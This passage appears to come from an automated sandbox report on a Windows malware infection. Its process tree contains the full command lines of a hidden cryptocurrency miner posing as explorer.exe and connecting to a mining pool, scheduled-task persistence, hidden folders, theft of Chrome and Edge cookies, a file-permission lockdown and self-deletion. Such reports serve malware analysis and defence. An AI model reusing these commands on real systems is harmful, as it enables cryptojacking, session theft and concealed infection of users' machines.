                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                    8⤵
                                                                                                                      PID:5352
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM --pass=30-60-miner --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60
                                                                                                                      8⤵
                                                                                                                        PID:2164
                                                                                                                  • C:\Users\Admin\Documents\ZD4czPwff9TPkwc_mEND_ecX.exe
                                                                                                                    "C:\Users\Admin\Documents\ZD4czPwff9TPkwc_mEND_ecX.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:3944
                                                                                                                  • C:\Users\Admin\Documents\7cKo6sI1wLMWhylPLKhKNsMe.exe
                                                                                                                    "C:\Users\Admin\Documents\7cKo6sI1wLMWhylPLKhKNsMe.exe"
                                                                                                                    6⤵
                                                                                                                      PID:4708
                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                        schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                                        7⤵
                                                                                                                        • Creates scheduled task(s)
                                                                                                                        PID:3092
                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                        cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                                        7⤵
                                                                                                                          PID:4960
                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                            attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                                                            8⤵
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:4568
                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                            attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                                            8⤵
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:2704
                                                                                                                        • C:\ProgramData\Provisioning\settings.exe
                                                                                                                          "C:\ProgramData\Provisioning\settings.exe"
                                                                                                                          7⤵
                                                                                                                            PID:5892
                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                              schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                                              8⤵
                                                                                                                              • Creates scheduled task(s)
                                                                                                                              PID:2292
                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                              cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                                              8⤵
                                                                                                                                PID:4956
                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                  attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                                                                  9⤵
                                                                                                                                  • Views/modifies file attributes
                                                                                                                                  PID:2168
                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                  attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                                                  9⤵
                                                                                                                                  • Views/modifies file attributes
                                                                                                                                  PID:4028
                                                                                                                          • C:\Users\Admin\Documents\guc1x6Sr2FX6ySuw1aj3GfVq.exe
                                                                                                                            "C:\Users\Admin\Documents\guc1x6Sr2FX6ySuw1aj3GfVq.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:816
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              7⤵
                                                                                                                                PID:2036
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                7⤵
                                                                                                                                  PID:5400
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  7⤵
                                                                                                                                    PID:1944
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                    7⤵
                                                                                                                                      PID:5320
                                                                                                                                  • C:\Users\Admin\Documents\nWMqY9hGfVTPalnubjrKAvaQ.exe
                                                                                                                                    "C:\Users\Admin\Documents\nWMqY9hGfVTPalnubjrKAvaQ.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:1012
                                                                                                                                    • C:\Users\Admin\Documents\nWMqY9hGfVTPalnubjrKAvaQ.exe
                                                                                                                                      C:\Users\Admin\Documents\nWMqY9hGfVTPalnubjrKAvaQ.exe
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:2212
                                                                                                                                  • C:\Users\Admin\Documents\h1np_CzMWPSThWERUc9pZHC5.exe
                                                                                                                                    "C:\Users\Admin\Documents\h1np_CzMWPSThWERUc9pZHC5.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:4256
                                                                                                                                    • C:\Users\Admin\Documents\3gva4BxQi4PabfyArSxU1gr7.exe
                                                                                                                                      "C:\Users\Admin\Documents\3gva4BxQi4PabfyArSxU1gr7.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:4132
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\3gva4BxQi4PabfyArSxU1gr7.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:6100
                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                            8⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:5380
                                                                                                                                      • C:\Users\Admin\Documents\JX983rVvfICRB8ePJYjvpMfo.exe
                                                                                                                                        "C:\Users\Admin\Documents\JX983rVvfICRB8ePJYjvpMfo.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:5116
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im JX983rVvfICRB8ePJYjvpMfo.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\JX983rVvfICRB8ePJYjvpMfo.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                          7⤵
                                                                                                                                            PID:5612
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /im JX983rVvfICRB8ePJYjvpMfo.exe /f
                                                                                                                                              8⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:2168
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 6
                                                                                                                                              8⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:5416
                                                                                                                                        • C:\Users\Admin\Documents\KDHI2QTz93SwfKADm0F3w6Ab.exe
                                                                                                                                          "C:\Users\Admin\Documents\KDHI2QTz93SwfKADm0F3w6Ab.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          PID:4536
                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5124
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                              8⤵
                                                                                                                                                PID:5860
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                8⤵
                                                                                                                                                  PID:5244
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  8⤵
                                                                                                                                                    PID:3208
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5256
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5584
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5976
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5308
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:5972
                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5140
                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5156
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5760
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4020
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:3168
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5504
                                                                                                                                                                • C:\Users\Admin\Documents\eJ9uW_JjvF6NmbxgBOrfijER.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\eJ9uW_JjvF6NmbxgBOrfijER.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:2268
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:5244
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:5608
                                                                                                                                                                  • C:\Users\Admin\Documents\BQJCcR2fCr_922vvowyN1kXI.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\BQJCcR2fCr_922vvowyN1kXI.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3068
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 656
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:3540
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 668
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:4216
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 672
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5360
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 668
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5528
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 1120
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5704
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 1168
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5856
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 1256
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:1860
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 1268
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5392
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "BQJCcR2fCr_922vvowyN1kXI.exe" /f & erase "C:\Users\Admin\Documents\BQJCcR2fCr_922vvowyN1kXI.exe" & exit
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:212
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill /im "BQJCcR2fCr_922vvowyN1kXI.exe" /f
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:5464
                                                                                                                                                                    • C:\Users\Admin\Documents\UlyMZqWCT4Gfkv_Ee5F0UZRU.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\UlyMZqWCT4Gfkv_Ee5F0UZRU.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:4368
                                                                                                                                                                        • C:\Users\Admin\Documents\UlyMZqWCT4Gfkv_Ee5F0UZRU.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\UlyMZqWCT4Gfkv_Ee5F0UZRU.exe" -a
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5396
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3216
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:4296
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_6.exe
                                                                                                                                                                        sonia_6.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:1420
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:3632
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4048
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:6020
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:3560
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 528
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:1480
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:4264
                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:4756
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:4424
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:3184
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_4.exe
                                                                                                                                                                    sonia_4.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:1588
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_1.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_1.exe" -a
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2304
                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:3416
                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:4388
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BB9B.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BB9B.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5988
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BB9B.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\BB9B.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5132
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Local\68b2cfda-1816-4256-b2c4-6d6c713064e6" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:3360
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BB9B.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\BB9B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6140
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BB9B.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\BB9B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:6136
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\8539b706-beb6-45af-a0f2-cb1597c31f27\build2.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\8539b706-beb6-45af-a0f2-cb1597c31f27\build2.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2616
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\8539b706-beb6-45af-a0f2-cb1597c31f27\build2.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\8539b706-beb6-45af-a0f2-cb1597c31f27\build2.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:1872
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\8539b706-beb6-45af-a0f2-cb1597c31f27\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:2024
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill /im build2.exe /f
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:5764
                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:6140
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CFC0.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\CFC0.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:1528
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F1B1.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\F1B1.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5296
                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:2928
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5960
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E6B1.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E6B1.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5852
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F056.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F056.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2264
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im F056.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F056.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3924
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill /im F056.exe /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:5564
                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:5128
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\69F.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\69F.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          PID:584
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9EB.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\9EB.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2892
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1A38.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1A38.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4348
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22C5.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22C5.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3180
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2660.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2660.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
